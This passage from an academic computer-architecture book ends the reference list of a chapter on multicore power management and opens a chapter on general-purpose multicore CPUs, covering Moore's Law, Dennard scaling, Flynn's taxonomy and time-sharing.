minimization under tight performance constraints in general purpose systems. In: Proceedings
of the 17th IEEE/ACM International Symposium on Low-Power Electronics and Design,
ISLPED ’11. IEEE Press, Fukuoka, Japan, pp 321–326. https://doi.org/10.1109/ISLPED.2011.
5993657
Bansal N, Pruhs KR (2010) Server scheduling to balance priorities, fairness, and average quality
of service. SIAM J Comput 39(7):3311–3335
Bhat G, Gumussoy S, Ogras UY (2019) Power and thermal analysis of commercial mobile plat-
forms: experiments and case studies. In: 2019 Design, Automation Test in Europe Conference
Exhibition (DATE), pp 144–149. https://doi.org/10.23919/DATE.2019.8714831
Binkert N, Beckmann B, Black G, Reinhardt SK, Saidi A, Basu A, Hestness J, Hower DR,
Krishna T, Sardashti S, Sen R, Sewell K, Shoaib M, Vaish N, Hill MD, Wood DA (2011) The
gem5 simulator. SIGARCH Comput Archit News 39(2):1–7. https://doi.org/10.1145/2024716.
2024718
17 Power Management of Multicore Systems 589
Brahim GB, Khan B (2006) Budgeting power: packet duplication and bit error rate reduction in
wireless ad-hoc networks. In: Proceedings of the 2006 International Conference on Wireless
Communications and Mobile Computing, pp 293–298
Carazo P, Apolloni R, Castro F, Chaver D, Pinuel L, Tirado F (2010) L1 data cache power
reduction using a forwarding predictor. In: Proceedings of the 20th International Conference
on Integrated Circuit and System Design: Power and Timing Modeling, Optimization and
Simulation, PATMOS’10. Springer, Berlin/Heidelberg, pp 116–125
Carter NP, Naeimi H, Gardner DS (2010) Design techniques for cross-layer resilience. In: 2010
Design, Automation Test in Europe Conference Exhibition (DATE 2010), pp 1023–1028.
https://doi.org/10.1109/DATE.2010.5456960
Chantem T, Hu XS, Dick RP (2010) Temperature-aware scheduling and assignment for hard real-
time applications on MPSoCs. IEEE Trans Very Large Scale Integr (VLSI) Syst 19(10):1884–
1897
Cox M, Singh AK, Kumar A, Corporaal H (2013) Thermal-aware mapping of streaming
applications on 3D multi-processor systems. In: Proceedings of IEEE Symposium on Embed-
ded Systems for Real-time Multimedia, pp 11–20. https://doi.org/10.1109/ESTIMedia.2013.
6704498
Das A, Kumar A, Veeravalli B (2013) Communication and migration energy aware design space
exploration for multicore systems with intermittent faults. In: 2013 Design, Automation Test
in Europe Conference Exhibition (DATE), pp 1631–1636. https://doi.org/10.7873/DATE.2013.
331
Das A, Kumar A, Veeravalli B (2014a) Energy-aware task mapping and scheduling for reliable
embedded computing systems. ACM Trans Embed Comput Syst (TECS) 13(2s):1–27
Das A, Kumar A, Veeravalli B (2014b) Temperature aware energy-reliability trade-offs for
mapping of throughput-constrained applications on multimedia MPSoCs. In: 2014 Design,
Automation & Test in Europe Conference & Exhibition (DATE). IEEE, pp 1–6
Das A, Kumar A, Veeravalli B, Bolchini C, Miele A (2014c) Combined DVFS and mapping
exploration for lifetime and soft-error susceptibility improvement in MPSoCs. In: Proceedings
on Design, Automation & Test in Europe Conference & Exhibition (DATE), pp 1–6. https://doi.
org/10.7873/DATE.2014.074
Das A, Shafik RA, Merrett GV, Al-Hashimi BM, Kumar A, Veeravalli B (2014d) Reinforcement
learning-based inter-and intra-application thermal optimization for lifetime improvement of
multicore systems. In: Proceedings of the 51st Annual Design Automation Conference, pp 1–6
Das A, Kumar A, Veeravalli B (2015a) Reliability and energy-aware mapping and scheduling of
multimedia applications on multiprocessor systems. IEEE Trans Parallel Distrib Syst (TPDS)
27(3):869–884
Das A, Kumar A, Veeravalli B, Shafik R, Merrett G, Al-Hashimi B (2015b) Workload uncertainty
characterization and adaptive frequency scaling for energy minimization of embedded systems.
In: Proceedings of Design, Automation & Test in Europe Conference & Exhibition (DATE).
IEEE, pp 43–48
Das AK, Kumar A, Veeravalli B, Catthoor F (2018) Introduction. Springer International Publish-
ing, Cham, pp 1–21. https://doi.org/10.1007/978-3-319-69374-3_1
Dennard RH, Gaensslen FH, Rideout VL, Bassous E, LeBlanc AR (1974) Design of ion-implanted
MOSFET’s with very small physical dimensions. IEEE J Solid-State Circuits 9(5):256–268.
https://doi.org/10.1109/JSSC.1974.1050511
Dey S, Singh AK, Wang X, McDonald-Maier K (2020) User interaction aware reinforcement
learning for power and thermal efficiency of CPU-GPU mobile MPSoCs. In: 2020 Design,
Automation & Test in Europe Conference & Exhibition (DATE). IEEE, pp 1728–1733
Dinakarrao SMP, Joseph A, Haridass A, Shafique M, Henkel J, Homayoun H (2019) Application
and thermal-reliability-aware reinforcement learning based multi-core power management.
ACM J Emerg Technol Comput Syst (JETC) 15(4):1–19
Flautner K, Kim NS, Martin S, Blaauw D, Mudge T (2002) Drowsy caches: simple techniques
for reducing leakage power. In: Proceedings of the 29th Annual International Symposium on
Computer Architecture, ISCA ’02. IEEE Computer Society, USA, pp 148–157
590 B. Ranjbar et al.
Gnad D, Shafique M, Kriebel F, Rehman S, Sun D, Henkel J (2015) Hayat: Harnessing dark silicon
and variability for aging deceleration and balancing. In: 2015 52nd ACM/EDAC/IEEE Design
Automation Conference (DAC). IEEE, pp 1–6
Held J, Bautista J, Koehl S (2006) From a few cores to many: a tera-scale computing research
overview. White paper, Intel
Henkel J, Dutt N (2021) Dependable embedded systems. Springer Nature. https://link.springer.
com/book/10.1007/978-3-030-52017-5
Huang K, Ha Y, Zhao R, Kumar A, Lian Y (2014) A low active leakage and high reliability phase
change memory (PCM) based non-volatile FPGA storage element. IEEE Trans Circuits Syst I:
Regul Pap 61(9):2605–2613
Isuwa S, Dey S, Ortega AP, Singh AK, Al-Hashimi BM, Merrett GV (2022) QUAREM:
Maximising QoE through adaptive resource management in mobile MPSoC platforms. ACM
Trans Embed Comput Syst (TECS) 21(4):1–29
Jin S, Qie X, Hao S (2019) Virtual machine allocation strategy in energy-efficient cloud data
centres. Int J Commun Netw Distrib Syst 22(2):181–195
Khanh PN, Singh AK, Kumar A, Aung KMM (2013) Incorporating energy and throughput
awareness in design space exploration and run-time mapping for heterogeneous MPSoCs. In:
2013 Euromicro Conference on Digital System Design. IEEE, pp 513–521
Kim N, Austin T, Baauw D, Mudge T, Flautner K, Hu J, Irwin M, Kandemir M, Narayanan V
(2003) Leakage current: Moore’s law meets static power. Computer 36(12):68–75. https://doi.
org/10.1109/MC.2003.1250885
Kim T, Sun Z, Chen HB, Wang H, Tan SXD (2017) Energy and lifetime optimizations for dark
silicon manycore microprocessor considering both hard and soft errors. IEEE Trans Very Large
Scale Integr (VLSI) Syst 25(9):2561–2574. https://doi.org/10.1109/TVLSI.2017.2707401
Kim W, Gupta MS, Wei GY, Brooks D (2008) System level analysis of fast, per-core DVFS using
on-chip switching regulators. In: 2008 IEEE 14th International Symposium on High Perfor-
mance Computer Architecture, pp 123–134. https://doi.org/10.1109/HPCA.2008.4658633
Kontorinis V, Shayan A, Tullsen DM, Kumar R (2009) Reducing peak power with a table-
driven adaptive processor core. In: 2009 42nd Annual IEEE/ACM International Symposium
on Microarchitecture (MICRO), pp 189–200. https://doi.org/10.1145/1669112.1669137
Kumar R, Zyuban V, Tullsen D (2005) Interconnections in multi-core architectures: understanding
mechanisms, overheads and scaling. In: 32nd International Symposium on Computer Architec-
ture (ISCA’05), pp 408–419. https://doi.org/10.1109/ISCA.2005.34
Li B, Wang X, Singh AK, Mak T (2019) On runtime communication and thermal-aware
application mapping and defragmentation in 3D NoC systems. IEEE Trans Parallel Distrib Syst
30(12):2775–2789
Li S, Ahn JH, Strong RD, Brockman JB, Tullsen DM, Jouppi NP (2013) The McPAT framework
for multicore and manycore architectures: simultaneously modeling power, area, and timing.
ACM Trans Archit Code Optim 10(1). https://doi.org/10.1145/2445572.2445577
Lin X, Wang Y, Pedram M (2016) A reinforcement learning-based power management framework
for green computing data centers. In: 2016 IEEE International Conference on Cloud Engineer-
ing (IC2E). IEEE, pp 135–138
Liu N, Li Z, Xu J, Xu Z, Lin S, Qiu Q, Tang J, Wang Y (2017) A hierarchical framework of cloud
resource allocation and power management using deep reinforcement learning. In: 2017 IEEE
37th International Conference on Distributed Computing Systems (ICDCS). IEEE, pp 372–382
Ma Y, Zhou J, Chantem T, Dick RP, Wang S, Hu XS (2018) Online resource management for
improving reliability of real-time systems on “big–little” type MPSoCs. IEEE Trans Comput-
Aided Des Integr Circuits Syst 39(1):88–100
Ma Y, Zhou J, Chantem T, Dick RP, Wang S, Hu XS (2019) Improving reliability of soft real-
time embedded systems on integrated CPU and GPU platforms. IEEE Trans Comput-Aided
Des Integr Circuits Syst 39(10):2218–2229
Mahesri A, Vardhan V (2005) Power consumption breakdown on a modern laptop. In: Falsafi B,
VijayKumar TN (eds) Power-aware computer systems. Springer, Berlin/Heidelberg, pp 165–
180
17 Power Management of Multicore Systems 591
Mamun SA (2021) Exploring wireless data center networks: can they reduce energy consumption
while providing secure connections? Ph.D. thesis, Rochester Institute of Technology, Rochester
Mamun SA, Gilday A, Singh AK, Ganguly A, Merrett GV, Wang X, Al-Hashimi BM (2020) Intra-
and inter-server smart task scheduling for profit and energy optimization of HPC data centers. J
Low Power Electron Appl 10(4):32
Medina R, Borde E, Pautet L (2018) Availability enhancement and analysis for mixed-criticality
systems on multi-core. In: Proceedings on Design, Automation & Test in Europe Conference &
Exhibition (DATE), pp 1271–1276
Mittal S (2012) A survey of architectural techniques for dram power management. Int J High
Perform Syst Archit 4(2):110–119. https://doi.org/10.1504/IJHPSA.2012.050990
Munawar W, Khdr H, Pagani S, Shafique M, Chen JJ, Henkel J (2014) Peak power management
for scheduling real-time tasks on heterogeneous many-core systems. In: Proceedings of IEEE
International Conference on Parallel and Distributed Systems (ICPADS), pp 200–209. https://
doi.org/10.1109/PADSW.2014.7097809
Narayanan S, Sartori J, Kumar R, Jones DL (2010) Scalable stochastic processors. In: 2010 Design,
Automation Test in Europe Conference Exhibition (DATE 2010), pp 335–338. https://doi.org/
10.1109/DATE.2010.5457181
Navardi M, Ranjbar B, Rohbani N, Ejlali A, Kumar A (2022) Peak-Power Aware Life-Time
Reliability Improvement in Fault-Tolerant Mixed-Criticality Systems. IEEE Open J Circuits
Syst 3:199–215. https://doi.org/10.1109/OJCAS.2022.3207598
Nawathe UG, Hassan M, Yen KC, Kumar A, Ramachandran A, Greenhill D (2008) Implementation
of an 8-core, 64-thread, power-efficient sparc server on a chip. IEEE J Solid-State Circuits
43(1):6–20. https://doi.org/10.1109/JSSC.2007.910967
Nicolaescu D, Veidenbaum A, Nicolau A (2003) Reducing data cache energy consumption via
cached load/store queue. In: Proceedings of the 2003 International Symposium on Low Power
Electronics and Design, ISLPED’03. pp 252–257. https://doi.org/10.1109/LPE.2003.1231871
Oudaa T, Gharsellaoui H, Ahmed SB (2021) An agent-based model for resource provisioning and
task scheduling in cloud computing using DRL. Proc Comput Sci 192:3795–3804
Pagani S, Pathania A, Shafique M, Chen JJ, Henkel J (2016) Energy efficiency for clustered
heterogeneous multicores. IEEE Trans Parallel Distrib Syst (TPDS) 28(5):1315–1330
Pagani S, Chen JJ, Shafique M, Henkel J (2018) Advanced techniques for power, energy,
and thermal management for clustered manycores. Springer. https://link.springer.com/book/10.
1007/978-3-319-77479-4
Pathania A, Pagani S, Shafique M, Henkel J (2015) Power management for mobile games on
asymmetric multi-cores. In: Proceedings of IEEE/ACM International Symposium on Low
Power Electronics and Design (ISLPED). IEEE, pp 243–248
PD SM, Lin J, Zhu S, Yin Y, Liu X, Huang X, Song C, Zhang W, Yan M, Yu Z, et al. (2017) A
scalable network-on-chip microprocessor with 2.5D integrated memory and accelerator. IEEE
Trans Circuits Syst I: Regul Pap 64(6):1432–1443
Puttaswamy K, Loh GH (2007) Thermal herding: Microarchitecture techniques for controlling
hotspots in high-performance 3D-integrated processors. In: 2007 IEEE 13th International
Symposium on High Performance Computer Architecture, pp 193–204. https://doi.org/10.1109/
HPCA.2007.346197
Ranjbar B, Nguyen TDA, Ejlali A, Kumar A (2019) Online peak power and maximum temperature
management in multi-core mixed-criticality embedded systems. In: Proceedings of Euromicro
Conference on Digital System Design (DSD), pp 546–553. https://doi.org/10.1109/DSD.2019.
00084
Ranjbar B, Nguyen TDA, Ejlali A, Kumar A (2021) Power-aware run-time scheduler for mixed-
criticality systems on multi-core platform. IEEE Trans Comput-Aided Des Integr Circuits Syst
(TCAD) 40(10):2009–2023. https://doi.org/10.1109/TCAD.2020.3033374
Ranjbar B, Hosseinghorban A, Salehi M, Ejlali A, Kumar A (2022) Toward the design of fault-
tolerance-and peak-power-aware multi-core mixed-criticality systems. IEEE Trans Comput-
Aided Des Integr Circuits Syst (TCAD) 41(5):1509–1522. https://doi.org/10.1109/TCAD.2021.
3082495
592 B. Ranjbar et al.
Rodrigues R, Annamalai A, Koren I, Kundu S, Khan O (2011) Performance per watt benefits of
dynamic core morphing in asymmetric multicores. In: 2011 International Conference on Parallel
Architectures and Compilation Techniques, pp 121–130. https://doi.org/10.1109/PACT.2011.18
Sahoo SS, Kumar A (2021a) CLEO-CoDE: Exploiting constrained decoding for cross-layer
energy optimization in heterogeneous embedded systems. In: 2021 IFIP/IEEE 29th International
Conference on Very Large Scale Integration (VLSI-SoC), pp 1–6. https://doi.org/10.1109/
VLSI-SoC53125.2021.9606983
Sahoo SS, Kumar A (2021b) Using Monte Carlo tree search for EDA – a case-study with
designing cross-layer reliability for heterogeneous embedded systems. In: 2021 IFIP/IEEE 29th
International Conference on Very Large Scale Integration (VLSI-SoC), pp 1–6. https://doi.org/
10.1109/VLSI-SoC53125.2021.9606987
Sahoo SS, Veeravalli B, Kumar A (2016) Cross-layer fault-tolerant design of real-time systems.
In: 2016 IEEE International Symposium on Defect and Fault Tolerance in VLSI and Nanotech-
nology Systems (DFT), pp 63–68. https://doi.org/10.1109/DFT.2016.7684071
Sahoo SS, Veeravalli B, Kumar A (2018) CLRFrame: an analysis framework for designing cross-
layer reliability in embedded systems. In: 31st International Conference on VLSI Design and
17th International Conference on Embedded Systems, VLSID 2018, 6–10 Jan 2018, Pune,
India, pp 307–312. https://doi.org/10.1109/VLSID.2018.81, http://doi.ieeecomputersociety.org/
10.1109/VLSID.2018.81
Sahoo SS, Veeravalli B, Kumar A (2019) A hybrid agent-based design methodology for dynamic
cross-layer reliability in heterogeneous embedded systems. In: Design Automation Conference,
DAC 2019, 2–6 June 2019, Las Vegas, Nevada
Sahoo SS, Veeravalli B, Kumar A (2020) CL(R)early: An early-stage DSE methodology for cross-
layer reliability-aware heterogeneous embedded systems. In: 2020 57th ACM/IEEE Design
Automation Conference (DAC), pp 1–6. https://doi.org/10.1109/DAC18072.2020.9218747
Sahoo SS, Kumar A, Decky M, Wong SCB, Merrett GV, Zhao Y, Wang J, Wang X, Singh AK
(2021a) Emergent design challenges for embedded systems and paths forward: mixed-criticality,
energy, reliability and security perspectives. In: Proceedings of the 2021 International Confer-
ence on Hardware/Software Codesign and System Synthesis, CODES/ISSS ’21. Association for
Computing Machinery, New York, pp 1–10. https://doi.org/10.1145/3478684.3479246
Sahoo SS, Ranjbar B, Kumar A (2021b) Reliability-aware resource management in multi-/many-
core systems: a perspective paper. J Low Power Electron Appl 11(1):7
Salehi M, Ejlali A (2014) A hardware platform for evaluating low-energy multiprocessor embed-
ded systems based on cots devices. IEEE Trans Ind Electron (TIE) 62(2):1262–1269
Shafique M, Khan MUK, Tüfek O, Henkel J (2015) EnAAM: energy-efficient anti-aging for on-
chip video memories. In: Proceedings of the 52nd Annual Design Automation Conference, pp
1–6
Sheikh SZ, Pasha MA (2018) Energy-efficient multicore scheduling for hard real-time systems: a
survey. ACM Trans Embed Comput Syst 17(6). https://doi.org/10.1145/3291387
Shekarisaz M, Hoseinghorban A, Bazzaz M, Salehi M, Ejlali A (2021) MASTER: Reclamation of
hybrid scratchpad memory to maximize energy saving in multi-core edge systems. IEEE Trans
Sustain Comput
Singh AK, Das A, Kumar A (2013) Energy optimization by exploiting execution slacks in
streaming applications on multiprocessor systems. In: Proceedings of the Design Automation
Conference (DAC), pp 1–7
Singh AK, Dziurzanski P, Indrusiak LS (2015a) Market-inspired Dynamic Resource Allocation in
Many-core High Performance Computing Systems. In: IEEE International Conference on High
Performance Computing & Simulation (HPCS), pp 413–420
Singh AK, Dziurzanski P, Indrusiak LS (2015b) Value and energy optimizing dynamic resource
allocation in many-core HPC systems. In: 2015 IEEE 7th International Conference on Cloud
Computing Technology and Science (CloudCom). IEEE, pp 180–185
Singh AK, Dziurzanski P, Indrusiak LS (2016a) Value and energy aware adaptive resource allo-
cation of soft real-time jobs on many-core HPC data centers. In: 2016 IEEE 19th International
Symposium on Real-Time Distributed Computing (ISORC). IEEE, pp 190–197
17 Power Management of Multicore Systems 593
Singh AK, Shafique M, Kumar A, Henkel J (2016b) Analysis and mapping for thermal and energy
efficiency of 3-D video processing on 3-D multicore processors. IEEE Trans Very Large Scale
Integr (VLSI) Syst 24(8):2745–2758
Singh AK, Dey S, McDonald-Maier K, Basireddy KR, Merrett GV, Al-Hashimi BM (2020)
Dynamic energy and thermal management of multi-core mobile platforms: a survey. IEEE
Design & Test 37(5):25–33
Sun G, Liao D, Zhao D, Xu Z, Yu H (2015) Live migration for multiple correlated virtual machines
in cloud-based data centers. IEEE Trans Services Comput 11(2):279–291
Turakhia Y, Raghunathan B, Garg S, Marculescu D (2013) Hades: architectural synthesis for
heterogeneous dark silicon chip multi-processors. In: 2013 50th ACM/EDAC/IEEE Design
Automation Conference (DAC), pp 1–7. https://doi.org/10.1145/2463209.2488948
Walker MJ, Merrett GV, Al-Hashimi B (2019) Power modelling of multicore sys-
tems. https://doi.org/10.1049/PBPC022E_ch13, https://digital-library.theiet.org/content/books/
10.1049/pbpc022e_ch13
Weste NH, Harris D (2015) CMOS VLSI design: a circuits and systems perspective. Pearson
Education India
Zhu Z, Zhang W, Chaturvedi V, Singh AK (2020) Energy minimization for multicore platforms
through DVFS and VR phase scaling with comprehensive convex model. IEEE Trans on
Comput-Aided Des Integr Circuits Syst 39(3):686–699. https://doi.org/10.1109/TCAD.2019.
2894835
General-Purpose Multicore Architectures
18
Saugata Ghose
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 596
Motivating the Need for Concurrent Processing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 598
Classifying Parallel Computing Hardware . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 598
Multiprocessing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 599
Thread-Level Parallelism Within an Application . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 601
What to Do With All These Transistors? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 604
Multicore CPU Hardware Design . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 606
Optimizing CPU Cores for Parallelism . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 606
Sharing Caches and Main Memory . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 609
Coordinating Memory Requests Across Cores . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 614
Scaling to Many Cores . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 614
Managing Memory . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 615
Shared-Memory Model . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 617
Main Memory Policies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 618
Mitigating Interference . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 621
Cache Coherence . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 622
Memory Consistency Models . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 626
Optimizing Operating Systems for Multicore CPUs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 628
Evaluating Multicore CPUs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 631
The Evolution of Multicore CPUs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 635
Systems-on-Chip . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 635
Heterogeneous CPU Cores . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 637
Chiplet-Based Multicore Design . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 638
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 640
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 640
S. Ghose ()
University of Illinois Urbana-Champaign, Urbana, IL, USA
e-mail: [email protected]
Abstract
The first years of the 2000s led to an inflection point in computer architectures:
While the number of available transistors on a chip continued to grow, crucial
transistor scaling properties started to break down and result in increasing
power consumption, while aggressive single-core performance optimizations
were resulting in diminishing returns due to inherent limits in instruction-level
parallelism. This led to the rise of multicore CPU architectures, which are now
commonplace in modern computers at all scales. This chapter discusses the
evolution of multicore CPUs since their introduction. Starting with a historic
overview of multiprocessing, the chapter explores the basic microarchitecture
of a multicore CPU, key challenges resulting from shared memory resources,
operating system modifications to optimize multicore CPU support, popular
metrics for multicore evaluation, and recent trends in multicore CPU design.
Keywords
Introduction
From the first commercial microprocessors in the 1970s through the end of the
1990s, microprocessors available on the market typically consisted of a single CPU
core per chip. During that time, significant architectural advancements were made to
improve the performance of the CPU core, including (but not limited to) techniques
such as out-of-order processing and superscalar execution that extracted instruction-
level parallelism (ILP) from single-thread sequential programs. These architectural
advancements were driven by two trends that governed advances in semiconductor
manufacturing process technologies. The first, Moore’s Law (Moore 1965), was an
observation made in 1965 by Gordon Moore that the number of transistors on an
integrated circuit (IC) doubled every year, which he revised in 1975 (Moore 1975)
to forecast a doubling every 2 years after 1980. Figure 1 shows a progression of
Moore’s Law, using real CPUs as examples, between 1971 and 2024. The second,
Dennard Scaling (Dennard et al. 1972, 1974), was a relationship identified by Robert
Dennard and his colleagues at IBM in the early 1970s, identifying that with every
new manufacturing process technology node (an approximately 18-month interval
at the time), both the area and the power consumption of a single transistor were
half of what was observed in the previous generation.
As Moore’s Law and Dennard Scaling made it more economical to increase
the number of transistors on a chip (effectively providing double the number of
transistors, at the same area and power budget, every 18–24 months), manufacturers
dedicated these additional transistors toward increasing the performance of the
single CPU core. Unfortunately, two critical factors made it difficult to keep
18 General-Purpose Multicore Architectures 597
1000B
Apple M1 Ultra
DEC Alpha 21164 EV5
Transistor Count
1B
Motorola 68000
1M Intel Itanium 2 9050
Intel 80486
1000
Intel 4004
1
1970 1975 1980 1985 1990 1995 2000 2005 2010 2015 2020 2025
Year of Release
Fig. 1 Log–linear plot of selected CPUs introduced between 1971 and 2024, illustrating the
progression of Moore’s Law
continuing this trend. First, as the “free” rewards of scaling started to break down
in the early 2000s, the areal power density (directly correlated to the amount of
heat dissipated per unit area) of high-end CPUs began growing rapidly (De and
Borkar 1999; Frank et al. 2001). Then-contemporary projections estimated that if
single-core CPU development continued along the trends of the time, commonplace
passive cooling elements would no longer be able to dissipate the heat generated by
the CPU (De and Borkar 1999). Second, more aggressive techniques for ILP were
yielding diminishing returns, requiring high hardware costs for meager performance
benefits (Ronen et al. 2001). These factors forced manufacturers to reconsider how
to use additional transistors to continue to deliver performance improvements, now
in a power-efficient manner (De and Borkar 1999; Ronen et al. 2001; Esmaeilzadeh
2011).
This reconsideration led to the widespread adoption of multicore CPUs (also
known as chip multiprocessors) (Ronen et al. 2001; Esmaeilzadeh 2011): Instead
of trying to make a single CPU core more powerful, manufacturers now implement
multiple, simpler CPU cores within a single chip that can run multiple tasks concur-
rently. (This chapter uses the term concurrent processing to refer strictly to multiple
independent tasks executing at the same time. It refers to the time multiplexing
of a CPU core across multiple tasks as time-sharing.) The simpler core designs
significantly reduced the areal power density (e.g., W/mm2 ) of the CPUs. Multicore
CPUs perform concurrent processing by (1) performing concurrent multiprocessing
of more than one program and/or (2) extracting thread-level parallelism (TLP)
from a parallelizable application. While initial commercial multicore CPUs started
out with two identical CPU cores, today’s multicore CPUs have a wide range of
configurations, with some containing dozens of cores.
This chapter will examine six topics related to multicore CPU architectures. First,
it will motivate the benefits and limitations of processing multiple tasks concurrently
and how they drove the need for parallel processing. Second, it will examine the
hardware design of a typical multicore CPU and the changes required to support
the efficient execution of multiple programs on multiple CPU cores. Third, it will
598 S. Ghose
study how memory management policies change to handle the increased traffic
from multiple cores. Fourth, it will address software issues that optimize the use of
multicore CPUs. Fifth, it will introduce common metrics that are used in the context
of multicore CPUs. Finally, it will close by briefly discussing how commercial
multicore CPUs have evolved since their introduction.
As early as the days of analog computing, the benefits of parallelizing tasks became
a clear goal: Luigi Federico Menabrea, in his 1842 study of Charles Babbage’s
Analytical Engine (Menabrea 1842), noted that a key advantage of mechanized
computation would be its ability to produce several results at the same time. In the
mid-twentieth century, as digital computers evolved rapidly, there was a pressing
need to maximize both the performance and utilization of these computers, and the
extraction of parallelism, in its various forms, became a key approach to meet these
needs.
The early decades of electronic computing saw the introduction of several now-
commonplace parallelization techniques, such as instruction pipelining (1941, with
the Zuse Z3 (Rojas 1996; Zuse 1949), followed by significant advances in 1961 with
the IBM 7030 Stretch (Dunwell 1956) and ILLIAC II (Taub et al. 1957) supercom-
puters), superscalar processing (1964, with the CDC 6600 supercomputer (Thornton
1964)), and general-purpose time-sharing (1961, with the Compatible Time-Sharing
System operating system (Corbató et al. 1962)). (In this section, significant efforts
were made to identify milestone systems that introduced or made critical leaps
forward in now-fundamental parallelism techniques. However, given the rapid pace
of concurrent computer development in the 1950s and 1960s, combined with limited
available historical resources, these examples may not always be the true originators
of the techniques. When possible, dates associated with systems denote the year of
first delivery, as a proxy for the completion of the first working system.) This set
the stage for the rise of the two key types of parallelism exposed by multicore
CPUs: multiprocessing and thread-level parallelism. While both of these types
of parallelism can be exploited by a range of hardware organizations, historical
trends in chip manufacturing process technologies drove the emergence of the
multicore CPU.
Given the rise of multiple parallel computing techniques throughout the 1960s,
there was a need to categorize the techniques based on broadly shared principles.
To this end, Michael Flynn developed what is now known as Flynn’s taxonomy in
1966 (Flynn 1966). The original taxonomy classified computer architectures into
four categories, along two dimensions as shown in Fig. 2:
18 General-Purpose Multicore Architectures 599
Data
SIMD MIMD
Multiprocessing
Before the days of personal computers (PCs), mainframes were the dominant
form factor of computers. Mainframe computers had a relatively high cost: as an
example, the IBM System/360 Model 25, a low-end variant of IBM’s highly popular
mainframes, was announced in January 1968 with a purchase price of US $253,000
(US $2.33 million in 2024 dollars), with a monthly rental option at $5,330 (US
$49,000 in 2024 dollars) (Whitney and White 1968). Given the high demand to
use these computers, batching and time-sharing (i.e., time multiplexing) systems
became commonplace. Systems capable of batching would queue up multiple jobs
to execute on a computer back-to-back, while time-sharing systems extended this
capability to execute multiple programs on the same computer through temporal
multiplexing.
600 S. Ghose
More concretely, time-sharing involves the use of scheduling quanta, which are
(typically predetermined) periods of time that a program can execute for before
being preempted (i.e., switched out). A time-sharing system runs one program for a
single scheduling quantum, after which it switches out the program from the CPU
and looks at a queue of pending programs (which include the one just switched
out, assuming it did not complete within the quantum). The system then selects
the next program to run, switches it into the CPU, and lets it execute for a single
scheduling quantum, before repeating the switch-out/switch-in procedure. Time-
sharing allowed multiple users to interact with a single computer at the same time,
allowing each user’s program to make forward progress even though the computer
had only a single CPU. Thanks to the typically short scheduling quanta (on the order
of milliseconds in modern machines), time-sharing often gives each user the illusion
that the computer is continuously executing their application, as the scheduling
quantum is significantly faster than human perception of response time.
While time-sharing represents a key technological shift in the accessibility of
computers, the technique suffers from two critical overheads that significantly
extend the overall execution time of a program. First, in an ideal machine, each
program now takes longer to complete as it repeatedly waits on other programs to
execute. For example, if a computer runs ten programs, each taking the same amount
